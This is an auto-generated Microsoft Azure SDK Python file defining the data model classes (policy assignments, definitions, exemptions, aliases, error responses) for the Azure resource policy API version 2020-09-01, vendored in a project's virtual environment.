venv/lib/python3.8/site-packages/azure/mgmt/resource/policy/v2020_09_01/models/_models_py3.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/azure/mgmt/resource/policy/v2020_09_01/models/_models_py3.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | 2
|
2021-05-23T16:46:31.000Z
|
2021-05-26T23:51:09.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class Alias(Model):
"""The alias type. .
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: The alias name.
:type name: str
:param paths: The paths for an alias.
:type paths:
list[~azure.mgmt.resource.policy.v2020_09_01.models.AliasPath]
:param type: The type of the alias. Possible values include:
'NotSpecified', 'PlainText', 'Mask'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasType
:param default_path: The default path for an alias.
:type default_path: str
:param default_pattern: The default pattern for an alias.
:type default_pattern:
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPattern
:ivar default_metadata: The default alias path metadata. Applies to the
default path and to any alias path that doesn't have metadata
:vartype default_metadata:
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathMetadata
"""
_validation = {
'default_metadata': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'paths': {'key': 'paths', 'type': '[AliasPath]'},
'type': {'key': 'type', 'type': 'AliasType'},
'default_path': {'key': 'defaultPath', 'type': 'str'},
'default_pattern': {'key': 'defaultPattern', 'type': 'AliasPattern'},
'default_metadata': {'key': 'defaultMetadata', 'type': 'AliasPathMetadata'},
}
def __init__(self, *, name: str=None, paths=None, type=None, default_path: str=None, default_pattern=None, **kwargs) -> None:
super(Alias, self).__init__(**kwargs)
self.name = name
self.paths = paths
self.type = type
self.default_path = default_path
self.default_pattern = default_pattern
self.default_metadata = None
class AliasPath(Model):
"""The type of the paths for alias.
Variables are only populated by the server, and will be ignored when
sending a request.
:param path: The path of an alias.
:type path: str
:param api_versions: The API versions.
:type api_versions: list[str]
:param pattern: The pattern for an alias path.
:type pattern: ~azure.mgmt.resource.policy.v2020_09_01.models.AliasPattern
:ivar metadata: The metadata of the alias path. If missing, fall back to
the default metadata of the alias.
:vartype metadata:
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathMetadata
"""
_validation = {
'metadata': {'readonly': True},
}
_attribute_map = {
'path': {'key': 'path', 'type': 'str'},
'api_versions': {'key': 'apiVersions', 'type': '[str]'},
'pattern': {'key': 'pattern', 'type': 'AliasPattern'},
'metadata': {'key': 'metadata', 'type': 'AliasPathMetadata'},
}
def __init__(self, *, path: str=None, api_versions=None, pattern=None, **kwargs) -> None:
super(AliasPath, self).__init__(**kwargs)
self.path = path
self.api_versions = api_versions
self.pattern = pattern
self.metadata = None
class AliasPathMetadata(Model):
"""AliasPathMetadata.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar type: The type of the token that the alias path is referring to.
Possible values include: 'NotSpecified', 'Any', 'String', 'Object',
'Array', 'Integer', 'Number', 'Boolean'
:vartype type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathTokenType
:ivar attributes: The attributes of the token that the alias path is
referring to. Possible values include: 'None', 'Modifiable'
:vartype attributes: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathAttributes
"""
_validation = {
'type': {'readonly': True},
'attributes': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(AliasPathMetadata, self).__init__(**kwargs)
self.type = None
self.attributes = None
class AliasPattern(Model):
"""The type of the pattern for an alias path.
:param phrase: The alias pattern phrase.
:type phrase: str
:param variable: The alias pattern variable.
:type variable: str
:param type: The type of alias pattern. Possible values include:
'NotSpecified', 'Extract'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPatternType
"""
_attribute_map = {
'phrase': {'key': 'phrase', 'type': 'str'},
'variable': {'key': 'variable', 'type': 'str'},
'type': {'key': 'type', 'type': 'AliasPatternType'},
}
def __init__(self, *, phrase: str=None, variable: str=None, type=None, **kwargs) -> None:
super(AliasPattern, self).__init__(**kwargs)
self.phrase = phrase
self.variable = variable
self.type = type
class CloudError(Model):
"""An error response from a policy operation.
:param error:
:type error: ~azure.mgmt.resource.policy.v2020_09_01.models.ErrorResponse
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorResponse'},
}
def __init__(self, *, error=None, **kwargs) -> None:
super(CloudError, self).__init__(**kwargs)
self.error = error
class CloudErrorException(HttpOperationError):
"""Server responsed with exception of type: 'CloudError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(CloudErrorException, self).__init__(deserialize, response, 'CloudError', *args)
class DataEffect(Model):
"""The data effect definition.
:param name: The data effect name.
:type name: str
:param details_schema: The data effect details schema.
:type details_schema: object
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'details_schema': {'key': 'detailsSchema', 'type': 'object'},
}
def __init__(self, *, name: str=None, details_schema=None, **kwargs) -> None:
super(DataEffect, self).__init__(**kwargs)
self.name = name
self.details_schema = details_schema
class DataManifestCustomResourceFunctionDefinition(Model):
"""The custom resource function definition.
:param name: The function name as it will appear in the policy rule. eg -
'vault'.
:type name: str
:param fully_qualified_resource_type: The fully qualified control plane
resource type that this function represents. eg -
'Microsoft.KeyVault/vaults'.
:type fully_qualified_resource_type: str
:param default_properties: The top-level properties that can be selected
on the function's output. eg - [ "name", "location" ] if vault().name and
vault().location are supported
:type default_properties: list[str]
:param allow_custom_properties: A value indicating whether the custom
properties within the property bag are allowed. Needs api-version to be
specified in the policy rule eg - vault('2019-06-01').
:type allow_custom_properties: bool
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'fully_qualified_resource_type': {'key': 'fullyQualifiedResourceType', 'type': 'str'},
'default_properties': {'key': 'defaultProperties', 'type': '[str]'},
'allow_custom_properties': {'key': 'allowCustomProperties', 'type': 'bool'},
}
def __init__(self, *, name: str=None, fully_qualified_resource_type: str=None, default_properties=None, allow_custom_properties: bool=None, **kwargs) -> None:
super(DataManifestCustomResourceFunctionDefinition, self).__init__(**kwargs)
self.name = name
self.fully_qualified_resource_type = fully_qualified_resource_type
self.default_properties = default_properties
self.allow_custom_properties = allow_custom_properties
class DataPolicyManifest(Model):
"""The data policy manifest.
Variables are only populated by the server, and will be ignored when
sending a request.
:param namespaces: The list of namespaces for the data policy manifest.
:type namespaces: list[str]
:param policy_mode: The policy mode of the data policy manifest.
:type policy_mode: str
:param is_built_in_only: A value indicating whether policy mode is allowed
only in built-in definitions.
:type is_built_in_only: bool
:param resource_type_aliases: An array of resource type aliases.
:type resource_type_aliases:
list[~azure.mgmt.resource.policy.v2020_09_01.models.ResourceTypeAliases]
:param effects: The effect definition.
:type effects:
list[~azure.mgmt.resource.policy.v2020_09_01.models.DataEffect]
:param field_values: The non-alias field accessor values that can be used
in the policy rule.
:type field_values: list[str]
:param standard: The standard resource functions (subscription and/or
resourceGroup).
:type standard: list[str]
:param custom: An array of data manifest custom resource definition.
:type custom:
list[~azure.mgmt.resource.policy.v2020_09_01.models.DataManifestCustomResourceFunctionDefinition]
:ivar id: The ID of the data policy manifest.
:vartype id: str
:ivar name: The name of the data policy manifest (it's the same as the
Policy Mode).
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/dataPolicyManifests).
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'namespaces': {'key': 'properties.namespaces', 'type': '[str]'},
'policy_mode': {'key': 'properties.policyMode', 'type': 'str'},
'is_built_in_only': {'key': 'properties.isBuiltInOnly', 'type': 'bool'},
'resource_type_aliases': {'key': 'properties.resourceTypeAliases', 'type': '[ResourceTypeAliases]'},
'effects': {'key': 'properties.effects', 'type': '[DataEffect]'},
'field_values': {'key': 'properties.fieldValues', 'type': '[str]'},
'standard': {'key': 'properties.resourceFunctions.standard', 'type': '[str]'},
'custom': {'key': 'properties.resourceFunctions.custom', 'type': '[DataManifestCustomResourceFunctionDefinition]'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, namespaces=None, policy_mode: str=None, is_built_in_only: bool=None, resource_type_aliases=None, effects=None, field_values=None, standard=None, custom=None, **kwargs) -> None:
super(DataPolicyManifest, self).__init__(**kwargs)
self.namespaces = namespaces
self.policy_mode = policy_mode
self.is_built_in_only = is_built_in_only
self.resource_type_aliases = resource_type_aliases
self.effects = effects
self.field_values = field_values
self.standard = standard
self.custom = custom
self.id = None
self.name = None
self.type = None
class ErrorAdditionalInfo(Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: object
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(self, **kwargs) -> None:
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorResponse(Model):
"""Error Response.
Common error response for all Azure Resource Manager APIs to return error
details for failed operations. (This also follows the OData error response
format.).
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details:
list[~azure.mgmt.resource.policy.v2020_09_01.models.ErrorResponse]
:ivar additional_info: The error additional info.
:vartype additional_info:
list[~azure.mgmt.resource.policy.v2020_09_01.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorResponse]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(self, **kwargs) -> None:
super(ErrorResponse, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class Identity(Model):
"""Identity for the resource.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar principal_id: The principal ID of the resource identity.
:vartype principal_id: str
:ivar tenant_id: The tenant ID of the resource identity.
:vartype tenant_id: str
:param type: The identity type. This is the only required field when
adding a system assigned identity to a resource. Possible values include:
'SystemAssigned', 'None'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.ResourceIdentityType
"""
_validation = {
'principal_id': {'readonly': True},
'tenant_id': {'readonly': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'type': {'key': 'type', 'type': 'ResourceIdentityType'},
}
def __init__(self, *, type=None, **kwargs) -> None:
super(Identity, self).__init__(**kwargs)
self.principal_id = None
self.tenant_id = None
self.type = type
class NonComplianceMessage(Model):
"""A message that describes why a resource is non-compliant with the policy.
This is shown in 'deny' error messages and on resource's non-compliant
compliance results.
All required parameters must be populated in order to send to Azure.
:param message: Required. A message that describes why a resource is
non-compliant with the policy. This is shown in 'deny' error messages and
on resource's non-compliant compliance results.
:type message: str
:param policy_definition_reference_id: The policy definition reference ID
within a policy set definition the message is intended for. This is only
applicable if the policy assignment assigns a policy set definition. If
this is not provided the message applies to all policies assigned by this
policy assignment.
:type policy_definition_reference_id: str
"""
_validation = {
'message': {'required': True},
}
_attribute_map = {
'message': {'key': 'message', 'type': 'str'},
'policy_definition_reference_id': {'key': 'policyDefinitionReferenceId', 'type': 'str'},
}
def __init__(self, *, message: str, policy_definition_reference_id: str=None, **kwargs) -> None:
super(NonComplianceMessage, self).__init__(**kwargs)
self.message = message
self.policy_definition_reference_id = policy_definition_reference_id
class ParameterDefinitionsValue(Model):
"""The definition of a parameter that can be provided to the policy.
:param type: The data type of the parameter. Possible values include:
'String', 'Array', 'Object', 'Boolean', 'Integer', 'Float', 'DateTime'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterType
:param allowed_values: The allowed values for the parameter.
:type allowed_values: list[object]
:param default_value: The default value for the parameter if no value is
provided.
:type default_value: object
:param metadata: General metadata for the parameter.
:type metadata:
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterDefinitionsValueMetadata
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'allowed_values': {'key': 'allowedValues', 'type': '[object]'},
'default_value': {'key': 'defaultValue', 'type': 'object'},
'metadata': {'key': 'metadata', 'type': 'ParameterDefinitionsValueMetadata'},
}
def __init__(self, *, type=None, allowed_values=None, default_value=None, metadata=None, **kwargs) -> None:
super(ParameterDefinitionsValue, self).__init__(**kwargs)
self.type = type
self.allowed_values = allowed_values
self.default_value = default_value
self.metadata = metadata
class ParameterDefinitionsValueMetadata(Model):
"""General metadata for the parameter.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param display_name: The display name for the parameter.
:type display_name: str
:param description: The description of the parameter.
:type description: str
:param strong_type: Used when assigning the policy definition through the
portal. Provides a context aware list of values for the user to choose
from.
:type strong_type: str
:param assign_permissions: Set to true to have Azure portal create role
assignments on the resource ID or resource scope value of this parameter
during policy assignment. This property is useful in case you wish to
assign permissions outside the assignment scope.
:type assign_permissions: bool
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'display_name': {'key': 'displayName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'strong_type': {'key': 'strongType', 'type': 'str'},
'assign_permissions': {'key': 'assignPermissions', 'type': 'bool'},
}
def __init__(self, *, additional_properties=None, display_name: str=None, description: str=None, strong_type: str=None, assign_permissions: bool=None, **kwargs) -> None:
super(ParameterDefinitionsValueMetadata, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.display_name = display_name
self.description = description
self.strong_type = strong_type
self.assign_permissions = assign_permissions
class ParameterValuesValue(Model):
"""The value of a parameter.
:param value: The value of the parameter.
:type value: object
"""
_attribute_map = {
'value': {'key': 'value', 'type': 'object'},
}
def __init__(self, *, value=None, **kwargs) -> None:
super(ParameterValuesValue, self).__init__(**kwargs)
self.value = value
class PolicyAssignment(Model):
"""The policy assignment.
Variables are only populated by the server, and will be ignored when
sending a request.
:param display_name: The display name of the policy assignment.
:type display_name: str
:param policy_definition_id: The ID of the policy definition or policy set
definition being assigned.
:type policy_definition_id: str
:ivar scope: The scope for the policy assignment.
:vartype scope: str
:param not_scopes: The policy's excluded scopes.
:type not_scopes: list[str]
:param parameters: The parameter values for the assigned policy rule. The
keys are the parameter names.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterValuesValue]
:param description: This message will be part of response in case of
policy violation.
:type description: str
:param metadata: The policy assignment metadata. Metadata is an open ended
object and is typically a collection of key value pairs.
:type metadata: object
:param enforcement_mode: The policy assignment enforcement mode. Possible
values are Default and DoNotEnforce. Possible values include: 'Default',
'DoNotEnforce'. Default value: "Default" .
:type enforcement_mode: str or
~azure.mgmt.resource.policy.v2020_09_01.models.EnforcementMode
:param non_compliance_messages: The messages that describe why a resource
is non-compliant with the policy.
:type non_compliance_messages:
list[~azure.mgmt.resource.policy.v2020_09_01.models.NonComplianceMessage]
:ivar id: The ID of the policy assignment.
:vartype id: str
:ivar type: The type of the policy assignment.
:vartype type: str
:ivar name: The name of the policy assignment.
:vartype name: str
:param location: The location of the policy assignment. Only required when
utilizing managed identity.
:type location: str
:param identity: The managed identity associated with the policy
assignment.
:type identity: ~azure.mgmt.resource.policy.v2020_09_01.models.Identity
"""
_validation = {
'scope': {'readonly': True},
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
}
_attribute_map = {
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'policy_definition_id': {'key': 'properties.policyDefinitionId', 'type': 'str'},
'scope': {'key': 'properties.scope', 'type': 'str'},
'not_scopes': {'key': 'properties.notScopes', 'type': '[str]'},
'parameters': {'key': 'properties.parameters', 'type': '{ParameterValuesValue}'},
'description': {'key': 'properties.description', 'type': 'str'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'enforcement_mode': {'key': 'properties.enforcementMode', 'type': 'str'},
'non_compliance_messages': {'key': 'properties.nonComplianceMessages', 'type': '[NonComplianceMessage]'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
}
def __init__(self, *, display_name: str=None, policy_definition_id: str=None, not_scopes=None, parameters=None, description: str=None, metadata=None, enforcement_mode="Default", non_compliance_messages=None, location: str=None, identity=None, **kwargs) -> None:
super(PolicyAssignment, self).__init__(**kwargs)
self.display_name = display_name
self.policy_definition_id = policy_definition_id
self.scope = None
self.not_scopes = not_scopes
self.parameters = parameters
self.description = description
self.metadata = metadata
self.enforcement_mode = enforcement_mode
self.non_compliance_messages = non_compliance_messages
self.id = None
self.type = None
self.name = None
self.location = location
self.identity = identity
class PolicyDefinition(Model):
"""The policy definition.
Variables are only populated by the server, and will be ignored when
sending a request.
:param policy_type: The type of policy definition. Possible values are
NotSpecified, BuiltIn, Custom, and Static. Possible values include:
'NotSpecified', 'BuiltIn', 'Custom', 'Static'
:type policy_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.PolicyType
:param mode: The policy definition mode. Some examples are All, Indexed,
Microsoft.KeyVault.Data. Default value: "Indexed" .
:type mode: str
:param display_name: The display name of the policy definition.
:type display_name: str
:param description: The policy definition description.
:type description: str
:param policy_rule: The policy rule.
:type policy_rule: object
:param metadata: The policy definition metadata. Metadata is an open
ended object and is typically a collection of key value pairs.
:type metadata: object
:param parameters: The parameter definitions for parameters used in the
policy rule. The keys are the parameter names.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterDefinitionsValue]
:ivar id: The ID of the policy definition.
:vartype id: str
:ivar name: The name of the policy definition.
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/policyDefinitions).
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'policy_type': {'key': 'properties.policyType', 'type': 'str'},
'mode': {'key': 'properties.mode', 'type': 'str'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'policy_rule': {'key': 'properties.policyRule', 'type': 'object'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'parameters': {'key': 'properties.parameters', 'type': '{ParameterDefinitionsValue}'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, policy_type=None, mode: str="Indexed", display_name: str=None, description: str=None, policy_rule=None, metadata=None, parameters=None, **kwargs) -> None:
super(PolicyDefinition, self).__init__(**kwargs)
self.policy_type = policy_type
self.mode = mode
self.display_name = display_name
self.description = description
self.policy_rule = policy_rule
self.metadata = metadata
self.parameters = parameters
self.id = None
self.name = None
self.type = None
class PolicyDefinitionGroup(Model):
"""The policy definition group.
All required parameters must be populated in order to send to Azure.
:param name: Required. The name of the group.
:type name: str
:param display_name: The group's display name.
:type display_name: str
:param category: The group's category.
:type category: str
:param description: The group's description.
:type description: str
:param additional_metadata_id: A resource ID of a resource that contains
additional metadata about the group.
:type additional_metadata_id: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'additional_metadata_id': {'key': 'additionalMetadataId', 'type': 'str'},
}
def __init__(self, *, name: str, display_name: str=None, category: str=None, description: str=None, additional_metadata_id: str=None, **kwargs) -> None:
super(PolicyDefinitionGroup, self).__init__(**kwargs)
self.name = name
self.display_name = display_name
self.category = category
self.description = description
self.additional_metadata_id = additional_metadata_id
class PolicyDefinitionReference(Model):
"""The policy definition reference.
All required parameters must be populated in order to send to Azure.
:param policy_definition_id: Required. The ID of the policy definition or
policy set definition.
:type policy_definition_id: str
:param parameters: The parameter values for the referenced policy rule.
The keys are the parameter names.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterValuesValue]
:param policy_definition_reference_id: A unique id (within the policy set
definition) for this policy definition reference.
:type policy_definition_reference_id: str
:param group_names: The name of the groups that this policy definition
reference belongs to.
:type group_names: list[str]
"""
_validation = {
'policy_definition_id': {'required': True},
}
_attribute_map = {
'policy_definition_id': {'key': 'policyDefinitionId', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterValuesValue}'},
'policy_definition_reference_id': {'key': 'policyDefinitionReferenceId', 'type': 'str'},
'group_names': {'key': 'groupNames', 'type': '[str]'},
}
def __init__(self, *, policy_definition_id: str, parameters=None, policy_definition_reference_id: str=None, group_names=None, **kwargs) -> None:
super(PolicyDefinitionReference, self).__init__(**kwargs)
self.policy_definition_id = policy_definition_id
self.parameters = parameters
self.policy_definition_reference_id = policy_definition_reference_id
self.group_names = group_names
class PolicyExemption(Model):
"""The policy exemption.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param policy_assignment_id: Required. The ID of the policy assignment
that is being exempted.
:type policy_assignment_id: str
:param policy_definition_reference_ids: The policy definition reference ID
list when the associated policy assignment is an assignment of a policy
set definition.
:type policy_definition_reference_ids: list[str]
:param exemption_category: Required. The policy exemption category.
Possible values are Waiver and Mitigated. Possible values include:
'Waiver', 'Mitigated'
:type exemption_category: str or
~azure.mgmt.resource.policy.v2020_09_01.models.ExemptionCategory
:param expires_on: The expiration date and time (in UTC ISO 8601 format
yyyy-MM-ddTHH:mm:ssZ) of the policy exemption.
:type expires_on: datetime
:param display_name: The display name of the policy exemption.
:type display_name: str
:param description: The description of the policy exemption.
:type description: str
:param metadata: The policy exemption metadata. Metadata is an open ended
object and is typically a collection of key value pairs.
:type metadata: object
:ivar system_data: Azure Resource Manager metadata containing createdBy
and modifiedBy information.
:vartype system_data:
~azure.mgmt.resource.policy.v2020_09_01.models.SystemData
:ivar id: The ID of the policy exemption.
:vartype id: str
:ivar name: The name of the policy exemption.
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/policyExemptions).
:vartype type: str
"""
_validation = {
'policy_assignment_id': {'required': True},
'exemption_category': {'required': True},
'system_data': {'readonly': True},
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'policy_assignment_id': {'key': 'properties.policyAssignmentId', 'type': 'str'},
'policy_definition_reference_ids': {'key': 'properties.policyDefinitionReferenceIds', 'type': '[str]'},
'exemption_category': {'key': 'properties.exemptionCategory', 'type': 'str'},
'expires_on': {'key': 'properties.expiresOn', 'type': 'iso-8601'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, policy_assignment_id: str, exemption_category, policy_definition_reference_ids=None, expires_on=None, display_name: str=None, description: str=None, metadata=None, **kwargs) -> None:
super(PolicyExemption, self).__init__(**kwargs)
self.policy_assignment_id = policy_assignment_id
self.policy_definition_reference_ids = policy_definition_reference_ids
self.exemption_category = exemption_category
self.expires_on = expires_on
self.display_name = display_name
self.description = description
self.metadata = metadata
self.system_data = None
self.id = None
self.name = None
self.type = None
class PolicySetDefinition(Model):
"""The policy set definition.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param policy_type: The type of policy definition. Possible values are
NotSpecified, BuiltIn, Custom, and Static. Possible values include:
'NotSpecified', 'BuiltIn', 'Custom', 'Static'
:type policy_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.PolicyType
:param display_name: The display name of the policy set definition.
:type display_name: str
:param description: The policy set definition description.
:type description: str
:param metadata: The policy set definition metadata. Metadata is an open
ended object and is typically a collection of key value pairs.
:type metadata: object
:param parameters: The policy set definition parameters that can be used
in policy definition references.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterDefinitionsValue]
:param policy_definitions: Required. An array of policy definition
references.
:type policy_definitions:
list[~azure.mgmt.resource.policy.v2020_09_01.models.PolicyDefinitionReference]
:param policy_definition_groups: The metadata describing groups of policy
definition references within the policy set definition.
:type policy_definition_groups:
list[~azure.mgmt.resource.policy.v2020_09_01.models.PolicyDefinitionGroup]
:ivar id: The ID of the policy set definition.
:vartype id: str
:ivar name: The name of the policy set definition.
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/policySetDefinitions).
:vartype type: str
"""
_validation = {
'policy_definitions': {'required': True},
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'policy_type': {'key': 'properties.policyType', 'type': 'str'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'parameters': {'key': 'properties.parameters', 'type': '{ParameterDefinitionsValue}'},
'policy_definitions': {'key': 'properties.policyDefinitions', 'type': '[PolicyDefinitionReference]'},
'policy_definition_groups': {'key': 'properties.policyDefinitionGroups', 'type': '[PolicyDefinitionGroup]'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, policy_definitions, policy_type=None, display_name: str=None, description: str=None, metadata=None, parameters=None, policy_definition_groups=None, **kwargs) -> None:
super(PolicySetDefinition, self).__init__(**kwargs)
self.policy_type = policy_type
self.display_name = display_name
self.description = description
self.metadata = metadata
self.parameters = parameters
self.policy_definitions = policy_definitions
self.policy_definition_groups = policy_definition_groups
self.id = None
self.name = None
self.type = None
class ResourceTypeAliases(Model):
"""The resource type aliases definition.
:param resource_type: The resource type name.
:type resource_type: str
:param aliases: The aliases for property names.
:type aliases: list[~azure.mgmt.resource.policy.v2020_09_01.models.Alias]
"""
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'aliases': {'key': 'aliases', 'type': '[Alias]'},
}
def __init__(self, *, resource_type: str=None, aliases=None, **kwargs) -> None:
super(ResourceTypeAliases, self).__init__(**kwargs)
self.resource_type = resource_type
self.aliases = aliases
class SystemData(Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource.
Possible values include: 'User', 'Application', 'ManagedIdentity', 'Key'
:type created_by_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the
resource. Possible values include: 'User', 'Application',
'ManagedIdentity', 'Key'
:type last_modified_by_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC)
:type last_modified_at: datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(self, *, created_by: str=None, created_by_type=None, created_at=None, last_modified_by: str=None, last_modified_by_type=None, last_modified_at=None, **kwargs) -> None:
super(SystemData, self).__init__(**kwargs)
self.created_by = created_by
self.created_by_type = created_by_type
self.created_at = created_at
self.last_modified_by = last_modified_by
self.last_modified_by_type = last_modified_by_type
self.last_modified_at = last_modified_at
| 40.370629
| 265
| 0.66566
|
d5a8077a73f7d41a3e06ba9c08322221d3ce0b42
| 826
|
py
|
Python
|
Packs/ReplaceMatchGroup/Scripts/ReplaceMatchGroup/ReplaceMatchGroup.py
|
ddi-danielsantander/content
|
67e2edc404f50c332d928dbdbce00a447bb5532f
|
[
"MIT"
] | 1
|
2020-04-19T11:05:42.000Z
|
2020-04-19T11:05:42.000Z
|
Packs/ReplaceMatchGroup/Scripts/ReplaceMatchGroup/ReplaceMatchGroup.py
|
ddi-danielsantander/content
|
67e2edc404f50c332d928dbdbce00a447bb5532f
|
[
"MIT"
] | 1
|
2020-07-29T21:48:58.000Z
|
2020-07-29T21:48:58.000Z
|
Packs/ReplaceMatchGroup/Scripts/ReplaceMatchGroup/ReplaceMatchGroup.py
|
ddi-danielsantander/content
|
67e2edc404f50c332d928dbdbce00a447bb5532f
|
[
"MIT"
] | 2
|
2020-07-15T06:41:52.000Z
|
